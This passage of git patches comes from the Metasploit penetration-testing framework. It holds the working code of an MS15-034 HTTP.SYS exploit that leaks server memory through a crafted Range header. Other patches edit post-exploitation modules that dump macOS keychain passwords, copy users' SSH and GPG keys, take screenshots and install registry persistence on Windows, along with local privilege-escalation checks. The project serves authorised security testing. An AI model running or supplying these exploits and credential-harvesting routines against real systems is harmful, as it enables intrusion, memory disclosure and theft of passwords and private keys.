+      },
+      'Author'      => 'Rich Whitcroft <rwhitcroft[at]gmail.com>',
+      'License'     => MSF_LICENSE,
+      'References'  => [ ['URL', 'http://securitysift.com/an-analysis-of-ms15-034/'] ]
+    )
+
+    register_options([
+      OptString.new('TARGET_URI', [ true, 'The path to the resource (must exist!)', '/iisstart.htm' ]),
+      OptInt.new('RPORT', [ true, 'The target port', 443 ]),
+      OptBool.new('SSL', [ true, 'Use SSL?', true ]),
+      OptBool.new('SUPPRESS_REQUEST', [ true, 'Suppress output of the requested resource', true ])
+    ], self.class)
+
+    deregister_options('VHOST')
+  end
+
+  def check
+    res = send_request_raw({
+      'uri' => datastore['TARGET_URI'],
+      'method' => 'GET',
+      'headers' => {
+        'Range' => 'bytes=0-18446744073709551615'
+      }
+    })
+    unless res
+      print_error("Error in send_request_raw")
+      return false
+    end
+
+    return (res.body.include?("Requested Range Not Satisfiable") ? true : false)
+  end
+
+  def dump(data)
+    # clear out the returned resource
+    if datastore['SUPPRESS_REQUEST']
+      dump_start = data.index('HTTP/1.1 200 OK')
+      if dump_start
+        data[0..dump_start-1] = ''
+      else
+        print_error("Memory dump start position not found, dumping all data instead")
+      end
+    end
+
+    i = 1
+    bytes_per_line = 16
+    lines_suppressed = 0
+    bytes = String.new
+    chars = String.new
+
+    print_good("Memory contents:")
+
+    data.each_byte do |b|
+      bytes << "%02x" % b.ord
+
+      if b.ord.between?(32, 126)
+        chars << b.chr
+      else
+        chars << "."
+      end
+
+      if i > 1 and i % bytes_per_line == 0
+        if bytes !~ /^[0f]{32}$/
+          bytes.gsub!(/(.{4})/, '\1 ')
+          print_status("#{bytes}   #{chars}")
+        else
+          lines_suppressed += 1
+        end
+
+        bytes.clear
+        chars.clear
+      end
+
+      i += 1
+    end
+
+    print_status("Suppressed #{lines_suppressed} uninteresting lines") unless lines_suppressed.zero?
+  end
+
+  def run_host(ip)
+    begin
+      unless check
+        print_error("Target is not vulnerable")
+        return
+      else
+        print_good("Target is vulnerable!")
+      end
+
+      # determine the size of the resource
+      res = send_request_raw({ 'uri' => datastore['TARGET_URI'], 'method' => 'GET' })
+      unless res
+        print_error("Error in send_request_raw")
+        return
+      end
+
+      if res.code == 200
+        content_length = res.headers['Content-Length'].to_i
+        print_good("Content length is #{content_length} bytes")
+      else
+        print_error("Error: HTTP code #{res.code}")
+        return
+      end
+
+      # build the Range header
+      ranges = "bytes=3-18446744073709551615"
+      range_step = 100
+      for range_start in (1..content_length).step(range_step) do
+        range_end = range_start + range_step - 1
+        range_end = content_length if range_end > content_length
+        ranges << ",#{range_start}-#{range_end}"
+      end
+
+      sock_opts = {
+        'SSL' => datastore['SSL'],
+        'SSLVersion' => datastore['SSLVersion'],
+        'LocalHost' => nil,
+        'PeerHost' => ip,
+        'PeerPort' => datastore['RPORT']
+      }
+
+      sock = Rex::Socket::Tcp.create(sock_opts)
+
+      req = "GET #{datastore['TARGET_URI']} HTTP/1.1\r\nHost: #{ip}\r\nRange: #{ranges}\r\n\r\n"
+      sock.put(req)
+
+      print_good("Stand by...")
+
+      resp = String.new
+      loop do
+        sleep 2
+
+        begin
+          buf = sock.get_once(-1, 2)
+          if buf
+            resp << buf
+          else
+            break
+          end
+        rescue
+          break
+        end
+      end
+
+      if resp and not resp.empty?
+        dump(resp)
+        loot_path = store_loot('iis.ms15034', 'application/octet-stream', ip, resp, nil, 'MS15-034 HTTP.SYS Memory Dump')
+        print_status("Memory dump saved to #{loot_path}")
+      else
+        print_error("Error receiving from socket or no data received")
+        return
+      end
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+      print_error("Unable to connect")
+      return
+    rescue ::Timeout::Error, ::Errno::EPIPE
+      print_error("Timeout receiving from socket")
+      return
+    ensure
+      sock.close if sock
+    end
+  end
+end

From 6a00ce62de4e9f177b14a8ee63518f31923e46d7 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 22 Jun 2015 12:24:31 -0500
Subject: [PATCH 0498/1013] Update persistence module

* Delete unused method
---
 modules/exploits/windows/local/persistence.rb | 18 ------------------
 1 file changed, 18 deletions(-)

diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb
index bd04998af2..d86b67c1be 100644
--- a/modules/exploits/windows/local/persistence.rb
+++ b/modules/exploits/windows/local/persistence.rb
@@ -145,24 +145,6 @@ class Metasploit3 < Msf::Exploit::Local
     return tempvbs
   end
 
-  # Executes script on target and returns true if it was successfully started
-  def target_exec(script_on_target)
-    execsuccess = true
-    print_status("Executing script #{script_on_target}")
-    # error handling for process.execute() can throw a RequestError in send_request.
-    begin
-      unless datastore['EXE::Custom']
-        session.shell_command_token(script_on_target)
-      else
-        session.shell_command_token("cscript \"#{script_on_target}\"")
-      end
-    rescue
-      print_error("Failed to execute payload on target host.")
-      execsuccess = false
-    end
-    return execsuccess
-  end
-
   # Installs payload in to the registry HKLM or HKCU
   def write_to_reg(key, script_on_target, registry_value)
     nam = registry_value || Rex::Text.rand_text_alpha(rand(8)+8)

From 60bdc10aeda20ecc34e0f1ba5edd61ec77a75607 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 22 Jun 2015 13:57:33 -0500
Subject: [PATCH 0499/1013] Update setuid_tunnelblick

* Use cmd_exec
---
 modules/exploits/osx/local/setuid_tunnelblick.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/osx/local/setuid_tunnelblick.rb b/modules/exploits/osx/local/setuid_tunnelblick.rb
index 1f2d31b0fe..c77d4a4a2a 100644
--- a/modules/exploits/osx/local/setuid_tunnelblick.rb
+++ b/modules/exploits/osx/local/setuid_tunnelblick.rb
@@ -61,7 +61,7 @@ class Metasploit4 < Msf::Exploit::Local
       return CheckCode::Safe
     end
 
-    check = session.shell_command_token("find  #{datastore["Tunnelblick"]} -type f -user root -perm -4000")
+    check = cmd_exec("find  #{datastore["Tunnelblick"]} -type f -user root -perm -4000")
 
     if check =~ /openvpnstart/
       return CheckCode::Vulnerable

From d98d2ffd4da8648a5904f47012fd4c3ad1163f77 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 22 Jun 2015 14:04:04 -0500
Subject: [PATCH 0500/1013] Update setuid_viscosity

* Use cmd_exec
---
 modules/exploits/osx/local/setuid_viscosity.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/osx/local/setuid_viscosity.rb b/modules/exploits/osx/local/setuid_viscosity.rb
index 1a78b4de19..019a6bb019 100644
--- a/modules/exploits/osx/local/setuid_viscosity.rb
+++ b/modules/exploits/osx/local/setuid_viscosity.rb
@@ -61,7 +61,7 @@ class Metasploit4 < Msf::Exploit::Local
       return CheckCode::Safe
     end
 
-    check = session.shell_command_token("find  #{datastore["Viscosity"]} -type f -user root -perm -4000")
+    check = cmd_exec("find  #{datastore["Viscosity"]} -type f -user root -perm -4000")
 
     if check =~ /ViscosityHelper/
       return CheckCode::Vulnerable

From d53067b0b760bf5583dedb2d7743e824c59cb267 Mon Sep 17 00:00:00 2001
From: Trevor Rosen <trevor@catapult-creative.com>
Date: Mon, 22 Jun 2015 14:17:29 -0500
Subject: [PATCH 0501/1013] Fix ctype handling for body-less pages

 #5515
---
 lib/msf/core/db_manager/web.rb | 10 +++++++++-
 1 file changed, 9 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/db_manager/web.rb b/lib/msf/core/db_manager/web.rb
index 414846be95..6d3773ba1b 100644
--- a/lib/msf/core/db_manager/web.rb
+++ b/lib/msf/core/db_manager/web.rb
@@ -142,8 +142,16 @@ module Msf::DBManager::Web
     page.cookie   = opts[:cookie] if opts[:cookie]
     page.auth     = opts[:auth]   if opts[:auth]
     page.mtime    = opts[:mtime]  if opts[:mtime]
-    page.ctype    = opts[:ctype]  if opts[:ctype]
+
+
+    if opts[:ctype].blank? || opts[:ctype] == [""]
+      page.ctype = ""
+    else
+      page.ctype = opts[:ctype]
+    end
+
     page.location = opts[:location] if opts[:location]
+
     msf_import_timestamps(opts, page)
     page.save!
 

From 784be06b6f140055d5b9d5daa070ee6e2e2527c1 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 22 Jun 2015 14:20:02 -0500
Subject: [PATCH 0502/1013] Update nmap

* Use cmd_exec
---
 modules/exploits/freebsd/local/mmap.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/freebsd/local/mmap.rb b/modules/exploits/freebsd/local/mmap.rb
index a8a8b51959..e16a64a85c 100644
--- a/modules/exploits/freebsd/local/mmap.rb
+++ b/modules/exploits/freebsd/local/mmap.rb
@@ -55,7 +55,7 @@ class Metasploit4 < Msf::Exploit::Local
   end
 
   def check
-    res = session.shell_command_token("uname -a")
+    res = cmd_exec('uname -a')
     return Exploit::CheckCode::Appears if res =~ /FreeBSD 9\.[01]/
 
     Exploit::CheckCode::Safe

From 4475b7ec8e23b2ac02b07490f162914a076a42b9 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 22 Jun 2015 14:30:46 -0500
Subject: [PATCH 0503/1013] Update enum_keychain

* Use cmd_exec
---
 modules/post/osx/gather/enum_keychain.rb | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/modules/post/osx/gather/enum_keychain.rb b/modules/post/osx/gather/enum_keychain.rb
index 7f464a6c29..deb9ee7eb0 100644
--- a/modules/post/osx/gather/enum_keychain.rb
+++ b/modules/post/osx/gather/enum_keychain.rb
@@ -29,16 +29,16 @@ class Metasploit3 < Msf::Post
   end
 
   def list_keychains
-    keychains = session.shell_command_token("security list")
-    user = session.shell_command_token("whoami")
+    keychains = cmd_exec("security list")
+    user = cmd_exec("whoami")
     print_status("The following keychains for #{user.strip} were found:")
     print_line(keychains.chomp)
     return keychains =~ /No such file or directory/ ? nil : keychains
   end
 
   def enum_accounts(keychains)
-    user =  session.shell_command_token("whoami").chomp
-    out = session.shell_command_token("security dump | egrep 'acct|desc|srvr|svce'")
+    user =  cmd_exec("whoami").chomp
+    out = cmd_exec("security dump | egrep 'acct|desc|srvr|svce'")
 
     i = 0
     accounts = {}
@@ -73,7 +73,7 @@ class Metasploit3 < Msf::Post
         s = accounts[num]["svce"]
       end
 
-      cmd = session.shell_command_token("security #{c} -ga \"#{accounts[num]["acct"]}\" -s \"#{s}\" 2>&1")
+      cmd = cmd_exec("security #{c} -ga \"#{accounts[num]["acct"]}\" -s \"#{s}\" 2>&1")
 
       cmd.split("\n").each do |line|
         if line =~ /password: /
@@ -109,7 +109,7 @@ class Metasploit3 < Msf::Post
       return
     end
 
-    user = session.shell_command_token("/usr/bin/whoami").chomp
+    user = cmd_exec("/usr/bin/whoami").chomp
     accounts = enum_accounts(keychains)
     save(accounts)
 

From 90e17aee6b6fcf327a237523cf4d05dd03f34ade Mon Sep 17 00:00:00 2001
From: rwhitcroft <rw81junk@gmail.com>
Date: Mon, 22 Jun 2015 15:47:26 -0400
Subject: [PATCH 0504/1013] clarified affected OSes and error messages

---
 .../http/ms15034_http_sys_memory_dump.rb      | 20 +++++++++----------
 1 file changed, 9 insertions(+), 11 deletions(-)

diff --git a/modules/auxiliary/scanner/http/ms15034_http_sys_memory_dump.rb b/modules/auxiliary/scanner/http/ms15034_http_sys_memory_dump.rb
index 9c3b84dd10..0c367394c6 100644
--- a/modules/auxiliary/scanner/http/ms15034_http_sys_memory_dump.rb
+++ b/modules/auxiliary/scanner/http/ms15034_http_sys_memory_dump.rb
@@ -15,14 +15,12 @@ class Metasploit3 < Msf::Auxiliary
     super(
       'Name'        => 'MS15-034 HTTP.SYS Memory Dump',
       'Description' => %q{
-        Dumps memory contents using a crafted Range header.
-        Reportedly affects Win7 and up, tested against Win8.1 and
-        Server 2012R2 with no crashes.  Note that if the target is
-        running in VMware Workstation, this module has a high likelihood
-        of resulting in BSOD. However, VMware ESX and non-virtualized
-        hosts seem stable.  Using a larger target file should result
-        in more memory being dumped, and SSL seems to produce more data
-        as well.
+        Dumps memory contents using a crafted Range header. Affects only
+        Windows 8.1, Server 2012, and Server 2012R2. Note that if the target
+        is running in VMware Workstation, this module has a high likelihood
+        of resulting in BSOD; however, VMware ESX and non-virtualized hosts
+        seem stable. Using a larger target file should result in more memory
+        being dumped, and SSL seems to produce more data as well.
       },
       'Author'      => 'Rich Whitcroft <rwhitcroft[at]gmail.com>',
       'License'     => MSF_LICENSE,
@@ -107,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary
         print_error("Target is not vulnerable")
         return
       else
-        print_good("Target is vulnerable!")
+        print_good("Target may be vulnerable...")
       end
 
       # determine the size of the resource
@@ -144,7 +142,7 @@ class Metasploit3 < Msf::Auxiliary
 
       sock = Rex::Socket::Tcp.create(sock_opts)
 
-      req = "GET #{datastore['TARGET_URI']} HTTP/1.1\r\nHost: #{ip}\r\nRange: #{ranges}\r\n\r\n"
+      req = "GET #{datastore['TARGET_URI']} HTTP/1.1\r\nHost: #{ip}\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)\r\nAccept: */*\r\nConnection: keep-alive\r\nRange: #{ranges}\r\n\r\n"
       sock.put(req)
 
       print_good("Stand by...")
@@ -170,7 +168,7 @@ class Metasploit3 < Msf::Auxiliary
         loot_path = store_loot('iis.ms15034', 'application/octet-stream', ip, resp, nil, 'MS15-034 HTTP.SYS Memory Dump')
         print_status("Memory dump saved to #{loot_path}")
       else
-        print_error("Error receiving from socket or no data received")
+        print_error("Target does not appear to be vulnerable (must be 8.1, 2012, or 2012R2)")
         return
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

From dedfca163d79f914447da713076660058d48f93b Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 22 Jun 2015 15:05:12 -0500
Subject: [PATCH 0505/1013] Change check()

---
 .../exploits/windows/local/ms15_051_client_copy_image.rb | 9 +++++++--
 1 file changed, 7 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/local/ms15_051_client_copy_image.rb b/modules/exploits/windows/local/ms15_051_client_copy_image.rb
index 9a278c72ae..12b4a247d8 100644
--- a/modules/exploits/windows/local/ms15_051_client_copy_image.rb
+++ b/modules/exploits/windows/local/ms15_051_client_copy_image.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Local
       'Description'     => %q{
         This module exploits improper object handling in the win32k.sys kernel mode driver.
         This module has been tested on vulnerable builds of Windows 7 x64 and x86, and
-        Windows 2008 R2 SP1 x64. The exploit should also work on earlier builds of windows.
+        Windows 2008 R2 SP1 x64.
       },
       'License'         => MSF_LICENSE,
       'Author'          => [
@@ -57,6 +57,11 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def check
+    # Windows Server 2008 Enterprise SP2 (32-bit)  6.0.6002.18005 (Does not work)
+    # Winodws 7 SP1 (64-bit)                       6.1.7601.17514 (Works)
+    # Windows 7 SP1 (32-bit)                       6.1.7601.17514 (Works)
+    # Windows Server 2008 R2 (64-bit) SP1          6.1.7601.17514 (Works)
+
     if sysinfo['OS'] !~ /windows/i
       return Exploit::CheckCode::Unknown
     end
@@ -71,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local
     major, minor, build, revision, branch = file_version(file_path)
     vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
 
-    return Exploit::CheckCode::Safe if build > 7601
+    return Exploit::CheckCode::Safe if build == 7601
 
     return Exploit::CheckCode::Detected
   end

From a309d99da9f11bdf119d0f1d4655ad585b990a07 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 22 Jun 2015 16:09:30 -0500
Subject: [PATCH 0506/1013] Fix enum_osx

* Use cmd_exec
---
 modules/post/osx/gather/enum_osx.rb | 185 +++++++++++++---------------
 1 file changed, 88 insertions(+), 97 deletions(-)

diff --git a/modules/post/osx/gather/enum_osx.rb b/modules/post/osx/gather/enum_osx.rb
index 297c8bb561..292418f5f4 100644
--- a/modules/post/osx/gather/enum_osx.rb
+++ b/modules/post/osx/gather/enum_osx.rb
@@ -33,22 +33,22 @@ class Metasploit3 < Msf::Post
     when /meterpreter/
       host = sysinfo["Computer"]
     when /shell/
-      host = session.shell_command_token("hostname").chomp
+      host = cmd_exec("hostname").chomp
     end
     print_status("Running module against #{host}")
     running_root = check_root
     if running_root
       print_status("This session is running as root!")
     end
+
     ver_num = get_ver
-    log_folder = log_folder_create()
+    log_folder = log_folder_create
     enum_conf(log_folder)
     enum_accounts(log_folder, ver_num)
     get_crypto_keys(log_folder)
     screenshot(log_folder, ver_num)
     dump_bash_history(log_folder)
     get_keychains(log_folder)
-
   end
 
   #parse the dslocal plist in lion
@@ -86,19 +86,19 @@ class Metasploit3 < Msf::Post
     #Get hostname
     case session.type
     when /meterpreter/
-      host = Rex::FileUtils.clean_path(sysinfo["Computer"])
+      host = Rex::FileUtils.clean_path(sysinfo['Computer'])
     when /shell/
-      host = Rex::FileUtils.clean_path(session.shell_command_token("hostname").chomp)
+      host = Rex::FileUtils.clean_path(cmd_exec('hostname').chomp)
     end
 
     # Create Filename info to be appended to downloaded files
-    filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
+    file_name_info = '_' + ::Time.now.strftime('%Y%m%d.%M%S')
 
     # Create a directory for the logs
     if log_path
-      logs = ::File.join(log_path, 'logs', "enum_osx", host + filenameinfo )
+      logs = ::File.join(log_path, 'logs', 'enum_osx', host + file_name_info )
     else
-      logs = ::File.join(Msf::Config.log_directory, "post", "enum_osx", host + filenameinfo )
+      logs = ::File.join(Msf::Config.log_directory, 'post', 'enum_osx', host + file_name_info )
     end
 
     # Create the log directory
@@ -111,10 +111,11 @@ class Metasploit3 < Msf::Post
     # Get only the account ID
     case session.type
     when /shell/
-      id = session.shell_command_token("/usr/bin/id -ru").chomp
+      id = cmd_exec("/usr/bin/id -ru").chomp
     when /meterpreter/
-      id = cmd_exec("/usr/bin/id","-ru").chomp
+      id = cmd_exec("/usr/bin/id", "-ru").chomp
     end
+
     if id == "0"
       return true
     else
@@ -129,7 +130,7 @@ class Metasploit3 < Msf::Post
     when /meterpreter/
       osx_ver = cmd_exec("/usr/bin/sw_vers", "-productName").chomp
     when /shell/
-      osx_ver = session.shell_command_token("/usr/bin/sw_vers -productName").chomp
+      osx_ver = cmd_exec("/usr/bin/sw_vers -productName").chomp
     end
     if osx_ver =~/Server/
       return true
@@ -143,60 +144,57 @@ class Metasploit3 < Msf::Post
     # Get the OS Version
     case session.type
     when /meterpreter/
-      osx_ver_num = cmd_exec("/usr/bin/sw_vers", "-productVersion").chomp
+      osx_ver_num = cmd_exec('/usr/bin/sw_vers', '-productVersion').chomp
     when /shell/
-      osx_ver_num = session.shell_command_token("/usr/bin/sw_vers -productVersion").chomp
+      osx_ver_num = cmd_exec('/usr/bin/sw_vers -productVersion').chomp
     end
 
-
     return osx_ver_num
   end
 
   def enum_conf(log_folder)
-    platform_type = session.platform
+
     session_type = session.type
-    profile_datatypes = {"OS" => "SPSoftwareDataType",
-      "Network" => "SPNetworkDataType",
-      "Bluetooth" => "SPBluetoothDataType",
-      "Ethernet" => "SPEthernetDataType",
-      "Printers" => "SPPrintersDataType",
-      "USB" => "SPUSBDataType",
-      "Airport" => "SPAirPortDataType",
-      "Firewall" => "SPFirewallDataType",
-      "Known Networks" => "SPNetworkLocationDataType",
-      "Applications" => "SPApplicationsDataType",
-      "Development Tools" => "SPDeveloperToolsDataType",
-      "Frameworks" => "SPFrameworksDataType",
-      "Logs" => "SPLogsDataType",
-      "Preference Panes" => "SPPrefPaneDataType",
-      "StartUp" => "SPStartupItemDataType"}
+    profile_datatypes = {
+      'OS' => 'SPSoftwareDataType',
+      'Network' => 'SPNetworkDataType',
+      'Bluetooth' => 'SPBluetoothDataType',
+      'Ethernet' => 'SPEthernetDataType',
+      'Printers' => 'SPPrintersDataType',
+      'USB' => 'SPUSBDataType',
+      'Airport' => 'SPAirPortDataType',
+      'Firewall' => 'SPFirewallDataType',
+      'Known Networks' => 'SPNetworkLocationDataType',
+      'Applications' => 'SPApplicationsDataType',
+      'Development Tools' => 'SPDeveloperToolsDataType',
+      'Frameworks' => 'SPFrameworksDataType',
+      'Logs' => 'SPLogsDataType',
+      'Preference Panes' => 'SPPrefPaneDataType',
+      'StartUp' => 'SPStartupItemDataType'
+    }
+
     shell_commands = {
-      "TCP Connections" => ["/usr/sbin/netstat","-np tcp"],
-      "UDP Connections" => ["/usr/sbin/netstat","-np udp"],
-      "Environment Variables" => ["/usr/bin/printenv",""],
-      "Last Boottime" => ["/usr/bin/who","-b"],
-      "Current Activity" => ["/usr/bin/who",""],
-      "Process List" => ["/bin/ps","-ea"]
+      'TCP Connections' => ['/usr/sbin/netstat', '-np tcp'],
+      'UDP Connections' => ['/usr/sbin/netstat', '-np udp'],
+      'Environment Variables' => ['/usr/bin/printenv', ''],
+      'Last Boottime' => ['/usr/bin/who', '-b'],
+      'Current Activity' => ['/usr/bin/who', ''],
+      'Process List' => ['/bin/ps', '-ea']
     }
 
     print_status("Saving all data to #{log_folder}")
 
     # Enumerate first using System Profiler
-    profile_datatypes.each do |name,profile_datatypes|
+    profile_datatypes.each do |name, profile_datatypes|
       print_status("\tEnumerating #{name}")
-
       # Run commands according to the session type
-
         if session_type =~ /meterpreter/
-
-          returned_data = cmd_exec("system_profiler",profile_datatypes)
-
+          returned_data = cmd_exec('system_profiler', profile_datatypes)
           # Save data lo log folder
           file_local_write(log_folder+"//#{name}.txt",returned_data)
         elsif session_type =~ /shell/
           begin
-            returned_data = session.shell_command_token("/usr/sbin/system_profiler #{profile_datatypes}",15)
-
+            returned_data = cmd_exec("/usr/sbin/system_profiler #{profile_datatypes}", 15)
             # Save data lo log folder
             file_local_write(log_folder+"//#{name}.txt",returned_data)
           rescue
@@ -207,20 +205,14 @@ class Metasploit3 < Msf::Post
     # Enumerate using system commands
     shell_commands.each do |name, command|
       print_status("\tEnumerating #{name}")
-
       # Run commands according to the session type
       begin
         if session_type =~ /meterpreter/
-
           command_output = cmd_exec(command[0],command[1])
-
           # Save data lo log folder
           file_local_write(log_folder+"//#{name}.txt",command_output)
-
         elsif session_type =~ /shell/
-
-          command_output = session.shell_command_token(command.join(" "),15)
-
+          command_output = cmd_exec(command[0], command[1])
           # Save data lo log folder
           file_local_write(log_folder+"//#{name}.txt",command_output)
         end
@@ -235,17 +227,16 @@ class Metasploit3 < Msf::Post
 
     # Specific commands for Leopard and Snow Leopard
     leopard_commands = {
-      "Users" => ["/usr/bin/dscacheutil","-q user"],
-      "Groups" => ["/usr/bin/dscacheutil","-q group"]
-
-      }
+      'Users' => ['/usr/bin/dscacheutil', '-q user'],
+      'Groups' => ['/usr/bin/dscacheutil', '-q group']
+    }
 
     # Specific commands for Tiger
     tiger_commands = {
-      "Users" => ["/usr/sbin/lookupd","-q user"],
-      "Groups" => ["/usr/sbin/lookupd","-q group"]
+      'Users' => ['/usr/sbin/lookupd', '-q user'],
+      'Groups' => ['/usr/sbin/lookupd', '-q group']
+    }
 
-      }
     if ver_num =~ /10\.(7|6|5)/
       shell_commands = leopard_commands
     else
@@ -257,17 +248,17 @@ class Metasploit3 < Msf::Post
       # Run commands according to the session type
       if session.type =~ /meterpreter/
 
-        command_output = cmd_exec(command[0],command[1])
+        command_output = cmd_exec(command[0], command[1])
 
         # Save data lo log folder
-        file_local_write(log_folder+"//#{name}.txt",command_output)
+        file_local_write(log_folder+"//#{name}.txt", command_output)
 
       elsif session.type =~ /shell/
 
-        command_output = session.shell_command_token(command.join(" "),15)
+        command_output = cmd_exec(command.join(' '), 15)
 
         # Save data lo log folder
-        file_local_write(log_folder+"//#{name}.txt",command_output)
+        file_local_write(log_folder + "//#{name}.txt", command_output)
       end
     end
 
@@ -284,16 +275,16 @@ class Metasploit3 < Msf::Post
       if not check_root
 
         # Enumerate the home folder content
-        home_folder_list = session.shell_command_token("/bin/ls -ma ~/").chomp.split(", ")
+        home_folder_list = cmd_exec("/bin/ls -ma ~/").chomp.split(", ")
 
         # Check for SSH folder and extract keys if found
         if home_folder_list.include?("\.ssh")
           print_status(".ssh Folder is present")
-          ssh_folder = session.shell_command_token("/bin/ls -ma ~/.ssh").chomp.split(", ")
+          ssh_folder = cmd_exec("/bin/ls -ma ~/.ssh").chomp.split(", ")
           ssh_folder.each do |k|
             next if k =~/^\.$|^\.\.$/
             print_status("\tDownloading #{k.strip}")
-            ssh_file_content = session.shell_command_token("/bin/cat ~/.ssh/#{k}")
+            ssh_file_content = cmd_exec("/bin/cat ~/.ssh/#{k}")
 
             # Save data lo log folder
             file_local_write(log_folder+"//#{name}",ssh_file_content)
@@ -303,14 +294,14 @@ class Metasploit3 < Msf::Post
         # Check for GPG and extract keys if found
         if home_folder_list.include?("\.gnupg")
           print_status(".gnupg Folder is present")
-          gnugpg_folder = session.shell_command_token("/bin/ls -ma ~/.gnupg").chomp.split(", ")
+          gnugpg_folder = cmd_exec("/bin/ls -ma ~/.gnupg").chomp.split(", ")
           gnugpg_folder.each do |k|
             next if k =~/^\.$|^\.\.$/
             print_status("\tDownloading #{k.strip}")
-            gpg_file_content = session.shell_command_token("/bin/cat ~/.gnupg/#{k.strip}")
+            gpg_file_content = cmd_exec("/bin/cat ~/.gnupg/#{k.strip}")
 
             # Save data lo log folder
-            file_local_write(log_folder+"//#{name}",gpg_file_content)
+            file_local_write(log_folder+"//#{name}", gpg_file_content)
           end
         end
       else
@@ -319,7 +310,7 @@ class Metasploit3 < Msf::Post
         when /meterpreter/
           users_folder = cmd_exec("/bin/ls","/Users")
         when /shell/
-          users_folder = session.shell_command_token("/bin/ls /Users")
+          users_folder = cmd_exec("/bin/ls /Users")
         end
         users_folder.each_line do |u|
           next if u.chomp =~ /Shared|\.localized/
@@ -327,14 +318,14 @@ class Metasploit3 < Msf::Post
         end
 
         users.each do |u|
-          user_folder = session.shell_command_token("/bin/ls -ma /Users/#{u}/").chomp.split(", ")
+          user_folder = cmd_exec("/bin/ls -ma /Users/#{u}/").chomp.split(", ")
           if user_folder.include?("\.ssh")
             print_status(".ssh Folder is present for #{u}")
-            ssh_folder = session.shell_command_token("/bin/ls -ma /Users/#{u}/.ssh").chomp.split(", ")
+            ssh_folder = cmd_exec("/bin/ls -ma /Users/#{u}/.ssh").chomp.split(", ")
             ssh_folder.each do |k|
               next if k =~/^\.$|^\.\.$/
               print_status("\tDownloading #{k.strip}")
-              ssh_file_content = session.shell_command_token("/bin/cat /Users/#{u}/.ssh/#{k}")
+              ssh_file_content = cmd_exec("/bin/cat /Users/#{u}/.ssh/#{k}")
 
               # Save data lo log folder
               file_local_write(log_folder+"//#{name}",ssh_file_content)
@@ -344,14 +335,14 @@ class Metasploit3 < Msf::Post
 
 
         users.each do |u|
-          user_folder = session.shell_command_token("/bin/ls -ma /Users/#{u}/").chomp.split(", ")
+          user_folder = cmd_exec("/bin/ls -ma /Users/#{u}/").chomp.split(", ")
           if user_folder.include?("\.ssh")
             print_status(".gnupg Folder is present for #{u}")
-            ssh_folder = session.shell_command_token("/bin/ls -ma /Users/#{u}/.gnupg").chomp.split(", ")
+            ssh_folder = cmd_exec("/bin/ls -ma /Users/#{u}/.gnupg").chomp.split(", ")
             ssh_folder.each do |k|
               next if k =~/^\.$|^\.\.$/
               print_status("\tDownloading #{k.strip}")
-              ssh_file_content = session.shell_command_token("/bin/cat /Users/#{u}/.gnupg/#{k}")
+              ssh_file_content = cmd_exec("/bin/cat /Users/#{u}/.gnupg/#{k}")
 
               # Save data lo log folder
               file_local_write(log_folder+"//#{name}",ssh_file_content)
@@ -371,22 +362,22 @@ class Metasploit3 < Msf::Post
       if check_root
         print_status("Capturing screenshot for each loginwindow process since privilege is root")
         if session.type =~ /shell/
-          loginwindow_pids = session.shell_command_token("/bin/ps aux \| /usr/bin/awk \'/name/ \&\& \!/awk/ \{print \$2\}\'").split("\n")
+          loginwindow_pids = cmd_exec("/bin/ps aux \| /usr/bin/awk \'/name/ \&\& \!/awk/ \{print \$2\}\'").split("\n")
           loginwindow_pids.each do |pid|
             print_status("\tCapturing for PID:#{pid}")
-            session.shell_command_token("/bin/launchctl bsexec #{pid} /usr/sbin/screencapture -x /tmp/#{pid}.jpg")
-            file_local_write(log_folder+"//screenshot_#{pid}.jpg",
-            session.shell_command_token("/bin/cat /tmp/#{pid}.jpg"))
-            session.shell_command_token("/usr/bin/srm -m -z /tmp/#{pid}.jpg")
+            cmd_exec("/bin/launchctl bsexec #{pid} /usr/sbin/screencapture -x /tmp/#{pid}.jpg")
+            file_local_write(log_folder + "//screenshot_#{pid}.jpg",
+                             cmd_exec("/bin/cat /tmp/#{pid}.jpg"))
+            cmd_exec("/usr/bin/srm -m -z /tmp/#{pid}.jpg")
           end
         end
       else
         # Run commands according to the session type
         if session.type =~ /shell/
-          session.shell_command_token("/usr/sbin/screencapture -x /tmp/#{picture_name}.jpg")
+          cmd_exec("/usr/sbin/screencapture -x /tmp/#{picture_name}.jpg")
           file_local_write(log_folder+"//screenshot.jpg",
-          session.shell_command_token("/bin/cat /tmp/#{picture_name}.jpg"))
-          session.shell_command_token("/usr/bin/srm -m -z /tmp/#{picture_name}.jpg")
+                           cmd_exec("/bin/cat /tmp/#{picture_name}.jpg"))
+          cmd_exec("/usr/bin/srm -m -z /tmp/#{picture_name}.jpg")
         end
       end
       print_status("Screenshot Captured")
